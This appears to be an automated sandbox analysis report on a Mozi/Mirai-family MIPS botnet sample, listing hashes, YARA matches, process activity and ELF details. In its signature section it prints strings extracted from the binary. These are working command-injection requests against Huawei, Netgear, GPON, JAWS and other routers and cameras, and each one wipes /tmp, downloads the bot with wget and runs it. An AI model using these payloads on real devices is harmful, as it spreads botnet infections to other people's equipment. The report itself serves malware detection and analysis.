Play interactive tour

Edit tour

Linux Analysis Report Mozi.m

Overview

General Information

Sample Name:	Mozi.m
Analysis ID:	453881
MD5:	cebe20a3e4eb38e9e37b995cf0d8f749
SHA1:	d1067600848180da20cc89930cac6da18c1ca213
SHA256:	db1b04ed7776bef94dbd281789c49ec4830354006f491eeb0e4c8690d7f8e5f9
Infos:

Detection

Mirai

Score:	76
Range:	0 - 100
Whitelisted:	false

Signatures

Multi AV Scanner detection for submitted file

Yara detected Mirai

Sample is packed with UPX

Sample contains only a LOAD segment without any section mappings

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample contains strings that are potentially command strings

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

Analysis Advice

Non-zero exit code suggests an error during the execution. Lookup the error code for hints.

Static ELF header machine description suggests that the sample might not execute correctly on this machine

Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	453881
Start date:	25.07.2021
Start time:	13:04:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 0s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Mozi.m
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:	default
Detection:	MAL
Classification:	mal76.troj.evad.linM@0/2@0/0
Warnings:	Show All VT rate limit hit for: http://purenetworks.com/HNAP1/

Process Tree

system is lnxubuntu1

Mozi.m (PID: 4568, Parent: 4497, MD5: cebe20a3e4eb38e9e37b995cf0d8f749) Arguments: /usr/bin/qemu-mips /tmp/Mozi.m

upstart New Fork (PID: 4587, Parent: 3310)

sh (PID: 4587, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 4588, Parent: 4587)

date (PID: 4588, Parent: 4587, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 4589, Parent: 4587)

apport-checkreports (PID: 4589, Parent: 4587, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system

upstart New Fork (PID: 4614, Parent: 3310)

sh (PID: 4614, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 4615, Parent: 4614)

date (PID: 4615, Parent: 4614, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 4617, Parent: 4614)

apport-gtk (PID: 4617, Parent: 4614, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

upstart New Fork (PID: 4641, Parent: 3310)

sh (PID: 4641, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9

sh New Fork (PID: 4645, Parent: 4641)

date (PID: 4645, Parent: 4641, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date

sh New Fork (PID: 4651, Parent: 4641)

apport-gtk (PID: 4651, Parent: 4641, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Mozi.m	SUSP_ELF_LNX_UPX_Compressed_File	Detects a suspicious ELF binary with UPX compression	Florian Roth	0x20828:$s1: PROT_EXEC\|PROT_WRITE failed. 0x20897:$s2: $Id: UPX 0x20848:$s3: $Info: This file is packed with the UPX executable packer
Mozi.m	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Mozi.m	JoeSecurity_Mirai_6	Yara detected Mirai	Joe Security
Mozi.m	JoeSecurity_Mirai_4	Yara detected Mirai	Joe Security

Jbx Signature Overview

• AV Detection
• Networking
• System Summary
• Data Obfuscation
• Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Mozi.m	Virustotal: Detection: 47%			Perma Link
Source: Mozi.m	ReversingLabs: Detection: 39%

Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.m	String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: Mozi.m	String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Mozi.m	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Mozi.m	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: Mozi.m	String found in binary or memory: http://upx.sf.net

Source: LOAD without section mappings

Program segment: 0x400000

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>

Source: Initial sample	Potential command found: mv -f
Source: Initial sample	Potential command found: w s"z6
Source: Initial sample	Potential command found: POST /GponForm/diag_?i
Source: Initial sample	Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample	Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample	Potential command found: GET /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /%s HTTP/1.1
Source: Initial sample	Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample	Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample	Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample	Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample	Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample	Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample	Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample	Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample	Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample	Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample	Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron

Source: Mozi.m, type: SAMPLE

Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4

Source: classification engine

Classification label: mal76.troj.evad.linM@0/2@0/0

Data Obfuscation:

Sample is packed with UPX

Show sources

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $

Source: /tmp/Mozi.m (PID: 4568)	Queries kernel information via 'uname':
Source: /usr/share/apport/apport-gtk (PID: 4617)	Queries kernel information via 'uname':
Source: /usr/share/apport/apport-gtk (PID: 4651)	Queries kernel information via 'uname':

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter1	Path Interception	Path Interception	Obfuscated Files or Information1	OS Credential Dumping	Security Software Discovery1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Mozi.m	48%	Virustotal		Browse
Mozi.m	39%	ReversingLabs	Linux.Trojan.Skeeyah

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://%s:%d/Mozi.a;sh$	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.a;chmod	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;/tmp/Mozi.m	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m	0%	Avira URL Cloud	safe
http://purenetworks.com/HNAP1/	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;	0%	Avira URL Cloud	safe
http://%s:%d/Mozi.m;$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Mozi.m	false		high
http://%s:%d/Mozi.a;sh$	Mozi.m	false	Avira URL Cloud: safe	low
http://%s:%d/Mozi.a;chmod	Mozi.m	false	Avira URL Cloud: safe	low
http://%s:%d/Mozi.m;/tmp/Mozi.m	Mozi.m	true	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/soap/encoding/	Mozi.m	false		high
http://schemas.xmlsoap.org/soap/envelope//	Mozi.m	false		high
http://%s:%d/Mozi.m	Mozi.m	true	Avira URL Cloud: safe	low
http://purenetworks.com/HNAP1/	Mozi.m	false	Avira URL Cloud: safe	unknown
http://%s:%d/Mozi.m;	Mozi.m	true	Avira URL Cloud: safe	low
http://%s:%d/Mozi.m;$	Mozi.m	true	Avira URL Cloud: safe	low
http://schemas.xmlsoap.org/soap/envelope/	Mozi.m	false		high

Contacted IPs

No contacted IP infos

Runtime Messages

Command:	/tmp/Mozi.m
Exit Code:	133
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 5 (Trace/breakpoint trap) - core dumped

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

/var/crash/_usr_share_apport_apport-checkreports.1000.crash Download File
Process:	/usr/share/apport/apport-checkreports
File Type:	ASCII text
Category:	dropped
Size (bytes):	14915
Entropy (8bit):	4.70703941891471
Encrypted:	false
SSDEEP:	96:mUSUM1S0oLf2NP3CEdU5NAnaMHdMXgIudNPKn/4EJdsPILd4YXrM:mUdONP3CEdKgIuE/4EbsPIhhbM
MD5:	409B9FEF1D6A919E61A71A3F7C7700E9
SHA1:	D6E4DD4CA6129CF522AF9026C29BBF9B3C30A63A
SHA-256:	7BEEF722D67598D7AD747DC73EB5F659C81306A9CAD3FEA3D9804436BB0F6126
SHA-512:	43FB8F0DEFBC735B9DA18D40053A8A586FD25848210F1A0EDC98CED1449F8EB2562DA80D88956CF8D92897A1B1CE2DCF24BAE0CACCA183AFD4246708F0A81FC8
Malicious:	false
Reputation:	low
Preview:	ProblemType: Crash.Date: Sun Jul 25 15:05:03 2021.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 0183c000-01b94000 rw-p 00000000 00:00 0 [heap]. 7fd6c712a000-7fd6c72ab000 rw-p 00000000 00:00 0 . 7fd6c72ab000-7fd6c72c2000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7fd6c72c2000-7fd6c74c1000 ---p 00017000 fc:0

/var/crash/_usr_share_apport_apport-gtk.1000.crash Download File
Process:	/usr/share/apport/apport-gtk
File Type:	ASCII text
Category:	dropped
Size (bytes):	47094
Entropy (8bit):	4.499624441689966
Encrypted:	false
SSDEEP:	384:mi9QQ6p1mNoiXZqA/B/m/7/LfJiZC7rJeNAPfUFObYIUioqRxLUeUZFEpF:PqA/B/m/7/IZCXaAPnYSoqRxQeUZFA
MD5:	444D97F3166D74AB937C2CE982EAE6DC
SHA1:	46EA5BDA0D999D1CED9B334C4BED0DCAF750B88D
SHA-256:	B039E88B63E1BD68BE452528A1484858B618B6DE383FF7EDF1A2D08C797CD473
SHA-512:	CC77E11A6A2CF62DC87386826CDBED7ED7F48B2E20F44AC6E9EE0D68AF4F44126A87B849B44F7286200436D23A88C32C473E9AB2395E0B8FA03F8D7D9D709156
Malicious:	false
Reputation:	low
Preview:	ProblemType: Crash.Date: Sun Jul 25 15:05:04 2021.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01f73000-02497000 rw-p 00000000 00:00 0 [heap]. 7f6716fca000-7f67170ca000 rw-p 00000000 00:00 0 . 7f67170ca000-7f67170e1000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7f67170e1000-7f67172e0000 ---p 00017000 fc:00 2382

Static File Info

General
File type:	ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
Entropy (8bit):	4.9371152282277
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	Mozi.m
File size:	307960
MD5:	cebe20a3e4eb38e9e37b995cf0d8f749
SHA1:	d1067600848180da20cc89930cac6da18c1ca213
SHA256:	db1b04ed7776bef94dbd281789c49ec4830354006f491eeb0e4c8690d7f8e5f9
SHA512:	683cd490acbbcd37673f37e1b98f66d2de4af6372cba220a52ff643fe94607b614990e987e24abbd9ad9ed6d2bfcd53a76b4022859f0cac7adebb82254417773
SSDEEP:	3072:phNlHuBafLeBtfCzpta8xlBIOdVo3/4sxLJ10xioo3Q:p3lOYoaja8xzx/0wsxzSiA
File Content Preview:	.ELF.....................B.....4.........4. ...(.............@...@...........................C...C......../...........UPX!.X.....................^....\|.$..ELF..........@.`....4...0... ...(......<...@......[v......H...`.t..;_...dt.Q.....].M..............

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MIPS R3000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4206a8
Flags:	0x1007
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	2
Section Header Offset:	0
Section Header Size:	40
Number of Section Headers:	0
Header String Table Index:	0

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x400000	0x400000	0x210f2	0x210f2	4.4337	0x5	R E	0x10000
LOAD	0x0	0x430000	0x430000	0x0	0x92fd8	0.0000	0x6	RW	0x10000

Network Behavior

No network behavior found

System Behavior

Analysis Process: Mozi.m PID: 4568 Parent PID: 4497

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/tmp/Mozi.m
Arguments:	/usr/bin/qemu-mips /tmp/Mozi.m
File size:	307960 bytes
MD5 hash:	cebe20a3e4eb38e9e37b995cf0d8f749

File Activities

File Read

Analysis Process: upstart PID: 4587 Parent PID: 3310

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/sbin/upstart
Arguments:	n/a
File size:	0 bytes
MD5 hash:	00000000000000000000000000000000

Analysis Process: sh PID: 4587 Parent PID: 3310

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/bin/sh
Arguments:	/bin/sh -e /proc/self/fd/9
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 4588 Parent PID: 4587

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 4588 Parent PID: 4587

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/bin/date
Arguments:	date
File size:	68464 bytes
MD5 hash:	54903b613f9019bfca9f5d28a4fff34e

File Activities

File Read

Analysis Process: sh PID: 4589 Parent PID: 4587

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-checkreports PID: 4589 Parent PID: 4587

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/usr/share/apport/apport-checkreports
Arguments:	/usr/bin/python3 /usr/share/apport/apport-checkreports --system
File size:	1269 bytes
MD5 hash:	1a7d84ebc34df04e55ca3723541f48c9

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/sbin/upstart
Arguments:	n/a
File size:	0 bytes
MD5 hash:	00000000000000000000000000000000

Analysis Process: sh PID: 4614 Parent PID: 3310

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/bin/sh
Arguments:	/bin/sh -e /proc/self/fd/9
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 4615 Parent PID: 4614

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 4615 Parent PID: 4614

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/bin/date
Arguments:	date
File size:	68464 bytes
MD5 hash:	54903b613f9019bfca9f5d28a4fff34e

File Activities

File Read

Analysis Process: sh PID: 4617 Parent PID: 4614

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-gtk PID: 4617 Parent PID: 4614

General

Start time:	13:05:03
Start date:	25/07/2021
Path:	/usr/share/apport/apport-gtk
Arguments:	/usr/bin/python3 /usr/share/apport/apport-gtk
File size:	23806 bytes
MD5 hash:	ec58a49a30ef6a29406a204f28cc7d87

General

Start time:	13:05:04
Start date:	25/07/2021
Path:	/sbin/upstart
Arguments:	n/a
File size:	0 bytes
MD5 hash:	00000000000000000000000000000000

Analysis Process: sh PID: 4641 Parent PID: 3310

General

Start time:	13:05:04
Start date:	25/07/2021
Path:	/bin/sh
Arguments:	/bin/sh -e /proc/self/fd/9
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

Analysis Process: sh PID: 4645 Parent PID: 4641

General

Start time:	13:05:04
Start date:	25/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: date PID: 4645 Parent PID: 4641

General

Start time:	13:05:04
Start date:	25/07/2021
Path:	/bin/date
Arguments:	date
File size:	68464 bytes
MD5 hash:	54903b613f9019bfca9f5d28a4fff34e

File Activities

File Read

Analysis Process: sh PID: 4651 Parent PID: 4641

General

Start time:	13:05:04
Start date:	25/07/2021
Path:	/bin/sh
Arguments:	n/a
File size:	4 bytes
MD5 hash:	e02ea3c3450d44126c46d658fa9e654c

Analysis Process: apport-gtk PID: 4651 Parent PID: 4641

General

Start time:	13:05:04
Start date:	25/07/2021
Path:	/usr/share/apport/apport-gtk
Arguments:	/usr/bin/python3 /usr/share/apport/apport-gtk
File size:	23806 bytes
MD5 hash:	ec58a49a30ef6a29406a204f28cc7d87

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report Mozi.m

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Initial Sample

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Malware Analysis System Evasion:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

System Behavior

Analysis Process: Mozi.m PID: 4568 Parent PID: 4497

General

File Activities

File Read

Analysis Process: upstart PID: 4587 Parent PID: 3310

General

Analysis Process: sh PID: 4587 Parent PID: 3310

General

File Activities

File Read

Analysis Process: sh PID: 4588 Parent PID: 4587

General

Analysis Process: date PID: 4588 Parent PID: 4587

General

File Activities

File Read

Analysis Process: sh PID: 4589 Parent PID: 4587

General

Analysis Process: apport-checkreports PID: 4589 Parent PID: 4587

General

File Activities

File Read

File Written

Directory Enumerated

Analysis Process: upstart PID: 4614 Parent PID: 3310

General

Analysis Process: sh PID: 4614 Parent PID: 3310

General

File Activities